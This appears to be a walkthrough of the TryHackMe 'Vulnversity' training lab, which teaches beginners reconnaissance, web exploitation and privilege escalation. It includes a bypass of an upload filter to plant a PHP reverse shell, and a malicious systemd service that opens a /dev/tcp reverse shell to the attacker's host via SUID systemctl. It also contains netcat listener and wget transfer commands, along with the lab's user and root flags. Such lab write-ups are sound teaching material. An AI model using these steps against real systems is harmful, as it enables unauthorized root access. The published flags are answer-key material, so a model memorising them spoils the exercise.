TryHackMe Vulnversity Walkthrough
This walkthrough will explore key cybersecurity concepts like reconnaissance, web application attacks, and privilege escalation. “Vulnversity” is an excellent room for beginners, as it introduces various essential tools and techniques.
Task 1: Deploy the Machine
The first task is simple — deploy the target machine by clicking the “Deploy” button on TryHackMe. This will spin up the environment we’ll be working with.
Q: Deploy the machine.
Answer: No answer needed
Task 2: Reconnaissance
Reconnaissance is crucial for any penetration test. It’s the process of gathering information about the target to identify potential vulnerabilities. We’ll use Nmap, one of the most widely used tools for network scanning.
Q: There are many Nmap “cheatsheets” online that you can use too.
Answer: No answer needed
Q: Scan the box; how many ports are open?
sudo nmap -sV -T4 10.10.112.222 -Pn
This Nmap command performs a service version detection (-sV) to identify the services running on the open ports. The -T4 flag speeds up the scan by adjusting the timing template, while -Pn skips host discovery, assuming the host is up.
Answer: 6
Q: What version of the squid proxy is running on the machine?
Answer: Squid HTTP proxy 3.5.12
Squid is a caching proxy for web traffic, often used to improve performance and security.
Q: How many ports will Nmap scan if the flag -p-400 is used?
Answer: 400
By default, Nmap scans the top 1000 ports. The -p-400 flag limits the scan to the first 400 ports.
Q: What is the most likely operating system this machine is running?
Answer: Ubuntu
Nmap provides hints about the operating system based on open ports and service versions. In this case, Ubuntu is the likely OS.
Q: What port is the web server running on?
Answer: 3333
Q: It’s essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
Answer: No answer needed
Q: What is the flag for enabling verbose mode using Nmap?
Answer: -v
Task 3: Locating Directories using Gobuster
Gobuster is a directory and file brute-forcer, used to find hidden directories on web servers. This is useful when performing web reconnaissance, as hidden paths could lead to valuable resources like login pages or upload forms.
Initially, I attempted to use Gobuster for brute-forcing hidden directories, but due to some issues with Gobuster not working properly, I switched to FFUF (Fast Web Fuzzer), which performs a similar function and is known for its speed and flexibility in directory brute-forcing.
Q: I have successfully configured Gobuster.
Answer: No answer needed
Q: What is the directory that has an upload form page?
Command for gobuster:
gobuster dir -u http://10.10.112.222:3333 -w /path/to/wordlistCommand for fuff:
ffuf -u http://10.10.112.222:3333/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Answer: /internal/
Task 4: Compromise the Web Server
Q: What common file type you’d want to upload to exploit the server is blocked?
Answer: .php
Most web servers block .php files by default because they can be used to execute arbitrary code, leading to server compromise.
Q: I understand the Burpsuite tool and its purpose during pentesting.
Answer: No answer needed
Q: What extension is allowed after running the above exercise?
Answer: .phtml
After testing various extensions, we discovered that .phtml is allowed. This is a file extension for PHP scripts and can still be executed by the server, allowing us to exploit it.
Q: While completing the above exercise, I have successfully downloaded the PHP reverse shell.
To exploit the server, we download a PHP reverse shell script from PentestMonkey’s repository. This script enables us to gain a remote shell on the target machine by sending back a connection to our machine.
Once uploaded, set up a listener on your machine using netcat:
nc -lvnp 4444After uploading the reverse shell and accessing it, we establish a connection to the server.
Q: What is the name of the user who manages the web server?
Answer: Bill
The
/etc/passwdfile stores user account information on Linux systems, and by inspecting this file, we discovered that there is a user named Bill who manages the web server.
Q: What is the user flag?
Answer: 8bd7992fbe8a6ad22a63361004cfcedb
The user flag is typically stored in the home directory of the compromised user. It’s a key piece of information to capture during a pentest.
Task 5: Privilege Escalation
Privilege escalation is the process of gaining higher-level privileges, typically root or administrator access, after gaining an initial foothold.
Q: On the system, search for all SUID files. Which file stands out?
find / -type f -perm -4000 -ls 2>dev/null-type f: Searches for files only.-perm -4000: Looks specifically for files with the SUID bit set.-ls: Lists the details of each file found.2>/dev/null: Suppresses error messages (like permission-denied errors).
Answer: /bin/systemctl
This command revealed that /bin/systemctl has the SUID bit set, meaning it runs with elevated privileges. This file stands out as it can be exploited to escalate privileges to root.
Q: What is the root flag value?
Step 1: Create a Malicious Service File
First, we created a malicious service file on our attacker machine. The service file contains instructions for the system to spawn a reverse shell when executed. Here’s the code we used:
[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/tun0_IP/4444 0>&1'
[Install]
WantedBy=multi-user.targetStep 2: Transfer the Malicious Service File to the Victim Machine
Next, we used a Python HTTP server to transfer the malicious service file to the victim machine.
- First, we hosted the malicious service file (root.service) on the attacker machine:
python3 -m http.server 80On the victim machine, we downloaded the file using wget:
wget http://10.9.243.55/root.service -O /tmp/root.serviceThis command retrieves the root.service file from our machine and saves it to the /tmp directory on the victim machine.
Step 3: Set Execute Permissions on the Service File
Once the file was transferred to the victim machine, we gave it execute permissions using the chmod command:
chmod +x /tmp/root.serviceStep 4: Enable the Malicious Service
Next, we used the systemctl command to enable the malicious service we just created:
systemctl enable /tmp/root.serviceThe enable command creates a symlink in the /etc/systemd/system/ directory, which tells the system to execute this service.
Step 5: Start the Netcat Listener on the Attacking Machine
Before starting the malicious service, we set up a Netcat listener on the attacker machine to catch the reverse shell. This will listen for incoming connections:
nc -lvp 4444Step 6: Start the Malicious Service
Now, we started the malicious service on the victim machine:
systemctl start rootThis command executes the malicious service, which triggers the reverse shell.
Step 7: Catch the Reverse Shell
Once the service was started, we received a reverse shell connection on our attacker machine via the Netcat listener. We now had root access on the victim machine, allowing us to escalate privileges and access sensitive directories such as /root.
Final Step: Retrieve the Root Flag
After gaining root access, we navigated to the /root directory and retrieved the root flag:
cat /root/root.txtAfter exploiting the SUID file, we gain root access and can find the root flag in the /root directory.
Answer: a58ff8579f0a9270368d33a9966c7fd5
Connect with me on LinkedIn: linkedin.com/in/raajeshmenghwar
